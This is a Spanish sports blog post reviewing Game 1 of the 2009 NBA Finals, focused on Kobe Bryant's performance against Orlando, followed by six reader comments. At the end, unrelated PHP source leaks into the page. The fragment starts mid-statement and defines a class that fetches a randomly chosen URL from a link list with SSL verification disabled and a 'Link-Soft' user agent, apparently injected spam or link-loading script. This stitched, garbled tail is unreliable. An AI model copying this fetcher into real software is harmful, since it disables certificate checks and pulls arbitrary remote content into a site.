Finales 2009 (Game 1): El Ángel Vengador

05 de June de 2009 por TheDeerHunter

paukbPoníamos ayer una serie de cuestiones encima de la mesa que debían resolver la ecuación del Anillo de campeón. Ya adelantábamos la posible cuota de error que supone el comparar la situación idílica de Orlando, con su maquinaria a pleno rendimiento para la eliminación de Boston y Cleveland, frente a las aparentes debilidades que han mostrado los actuales subcampeones en buena parte de la postemporada.

Quizás el más audaz que se ha prometido hasta ahora en la gran mayoría de los medios era pronosticar que la dupla Pietrus & Cortney Lee, siendo ambos excelentes defensores de perímetro, quizás pudieran siquiera igualar el trabajo defensivo que antes realizaron Battier & Artest o el del año pasado en este mismo instante, de los perros de presa exteriores en los Celtics, con el master aplicado de Ray Allen de exponente.

Ayer el número 24 vestido de amarillo se encargó de dejar claro cuál es la diferencia de nivel entre unos y otros, anotando cuando y como quiso para reventar el partido en su reentrada a mediados del segundo cuarto. A partir de ahí el parcial fue de 54 a 25 hasta el final del tercer cuarto, momento en el que comenzaba un último período que ya sobraba.

Pero es que, a pesar de lo sorprendente del parcial, no podemos encontrar ningún número que pueda reflejar la magnitud de la actuación de Kobe en esos dos cuartos, actuación que firmaría cualquiera de los grandes para un partido completo de esta categoría. No sólo fue la velocidad con la que cayeron los puntos ante la teórica sólida defensa de Orlando, la majestuosidad de sus movimientos o la calidad técnica de los mismos, sin parangón ninguno en el baloncesto actual, sino también su capacidad para utilizar al resto en los momentos puntuales que hizo falta y también su liderazgo defensivo al otro lado de la pista. Descomunal. La sublimación del baloncesto como arte.

finalsEnfrente, unos y otros sufrieron como pudieron la pesadilla. Sólo Turkoglu pudo hacer algo durante el primer cuarto, que alargó el prometedor regreso de Nelson durante unos instantes del 2º tiempo. Nada más en el horizonte. A partir de ahí, el más severo hundimiento en todos los ámbitos. Dwight Howard sólo pudo anotar un tiro de campo en todo el partido por culpa del inspirado inicio de Bynum que, con algunas faltas absurdas, se autoexpulsó del partido, y después con el pegajoso marcaje por anticipación de Gasol y el modo con el que se cerró el rebote. Después, el calvario de Rashard Lewis que entró en el partido entregado, lanzando terroríficamente a canasta. Y, por último, el excelente balance defensa/ataque que desplegaron Odom, Fisher, Walton y Ariza, ajustando sobre Turkoglu, o el tremendo agujero que tiene Orlando en la posición de alero cuando éste se encuentra en el banco. El todo contra la nada. Y el resultado, una severa paliza.

De otros momentos malos se ha levantado Orlando, desde las primeras derrotas contra los Sixers, pasando por el partido que perdonaron a los Celtics o “El tiro” de LeBron, si bien ninguno ha sido un castigo como el de anoche. Hasta el domingo tienen tiempo para pensar en lo que ha sucedido. Como mínimo será difícil hacerlo peor que anoche. ¿Debería esto suponer un alivio?

PREMIOS

MVP: Aunque la actuación de Kobe Bryant va más allá de las estadísticas, conviene apuntar que es la cuarta ocasión en la historia de las Finales en la que un jugador logra 40-8-8 en puntos, rebotes y asistencias, y que así se convierte además en el quinto jugador en anotar al menos 40 puntos en el primer partido de la eliminatoria por el título. La declaración de intenciones de Bryant pone la serie de cara para los Lakers.

La sorpresa: De Luke Walton no hay que esperar grandes números. Ayer sin embargo supuso una gran contribución desde el banquillo con 9 puntos (4 de 5 en tiros), seis de ellos de forma consecutiva para neutralizar la mayor renta con la que contaron los Magic (31-26). Walton sumó además 2 rebotes, 2 asistencias y 1 robo en 24 minutos de juego.magicbench

La decepción: Entre Howard, Turkoglu y Lewis anotaron 6 tiros de campo en 27 intentos. Las Finales se acabarán rápido si se repiten actuaciones como éstas.

El mayor esfuerzo en vano: “He intentado hacerlo lo mejor posible, pero todo el mundo sabe que este tipo es una leyenda. ¿Qué puedo hacer?” Las palabras de Mickael Pietrus tras el partido reflejan lo sucedido. El francés fue el máximo anotador de su equipo y se esforzó al máximo en defensa para fratar de frenar a Bryant. Obviamente, fue en vano.

Os dejamos con el vídeo resumen del partido:

Comenta

6 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Un detalle que apuntaba Univerzee en su blog y que nosotros no hemos mencionado…

    La aparición de Nelson, bien al principio y tal… pero conforme fueron pasando los minutos fue una cagada en toda regla. Tirar a Alston a los leones con lo mucho que le necesitan todavía… no tiene nombre por parte de Van Gundy.

    Muy fuerte moralmente tiene que estar Alston para que no le afecte… y dudo mucho que Nelson esté en condiciones de siquiera garantizar siquiera los números del otro, sin contar la defensa.

      Citar

  2. toni dice:
    #2

    Muy acertado lo de Walton, pero yo me quedo con su defensa sobre Turkoglu, de inicio a Ariza le costó mucho frenar la clase y el saber estar de Hedo. Por otro lado, en cuanto entró Walton, todo fué mas facil, las ayudas, se movía mas gente en ataque…
    Quitando las faltitas tontas de Bynum, lo ha hecho bastante bien.
    Me ha gustado bastante Pau aunque de cara al aro podría haber estado mas efectivo pero no nos podemos quejar.
    Howard debe ganarse mi admiración todavía, aunque no se bien bien porqué, pero creo que en esta serie no lo va a lograr.
    No hace falta de hablar de la manera de Kobe de enseñar los dientes… simplemente impresionante, que demostración de superioridad, sobre todo, en el segundo cuarto fué espectacular.
    ¡DESEANDO QUE LLEGUE EL 2o ASALTO!

      Citar

  3. Txusma dice:
    #3

    Mensaje de los Lakers a Orlando: “Bienvenidos a las… ¡¡¡¡¡FINALES!!!!”. Se ha de notar que uno de los 2 equipos este plenamente acostumbrado a estas alturas.

      Citar

  4. Dantley2 dice:
    #4

    Que bueno es el 24. Sinceramente prefiero disfrutar lo que ha hecho que ponerme a pensar cómo debe administrar su papel de líder. Creo que ayer la contundencia de la victoria de Lakers sobrepasa hipotéticas consecuencias de una papel hipotéticamente excesivo de Bryant.

    Lo que sí que visto lo visto es un error es ese apunte de Nelson. Alston estuvo a ratos brillante en los playoffs y justo es ahí donde más cojean los Lakers. No le mandes un mensaje tan brutal de que está de prestado en el 5 inicial, cuando además no lo está, se lo ha ganado con varios partidos decisivos.

      Citar

  5. univerzee dice:
    #5

    TheDeerHunter hemos comentado ya este partido bastante, coincidimos en muchas cosas, pero por hablar 🙂 Para mi Pietrus estuvo agotado, acogotado en defensa, Kobe a anotado más y contra gente más complicada… ayer el movimiento de pies de Pietrus no tenia nada que ver con el movimiento de pies que realizó contra LBJ… estoy convencido que estaba sobrepasado por las finales, sino no logro comprender porque no llegaba a saltarle a ningún tiro… me recordaba a mi cuando me ponia a pitar los partidillos de entrenamiento y cuando vas a pitar, ya dices… un poco tarde que sigan… y la siguiente igual, vas lento de reflejos, que sigan… hasta que tienes que pararlo porque se te pegan los jugadores… pues así Pietrus, medio segundo tarde que le daba para pensar… para que le voy a poner la mano si ya ha tirado, para que saltar si ya esta arriba.
    La decepción para mi es Stan Van Gundy y su experimento gaseoso, Nalson… lo de estar fallón pues puede pasarle hasta a Kobe.
    Y hablando de Walton, lo que voy a decir igual me crea mas liso que beneficios… seguramente es junto con Gasol el jugador que más entiende el juego teorico de LAL y triangulos, pero es que hace tiempo que en LAL ya no se hacen triangulos. tiene muchas limitaciones, en tiro, en cortes, pero tiene visión del juego y de los espacios, claro es un teorico, no ncesariamente eso garantiza que sea bueno, no? En los CHI de Jordan jugaban jugadores de medio pelo que sólo sabian hacer dos cositas bien, pero que comprendian el juego… porque el juego no es mecanico, empieza mecanico, pero en cualquier momento se lia y hay que saber donde colocarse… eso Walton sabe hacerlo, otros no. Saludos, muy bueno TheDeerhunter.

      Citar

  6. MagicJohnson32 dice:
    #6

    Esta noche es EL PARTIDO. Un 2-0 parecería definitivo. Orlando ha de dar un golpe de autoridad y espero que salgan muy agresivos. Let’s go Lakers!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>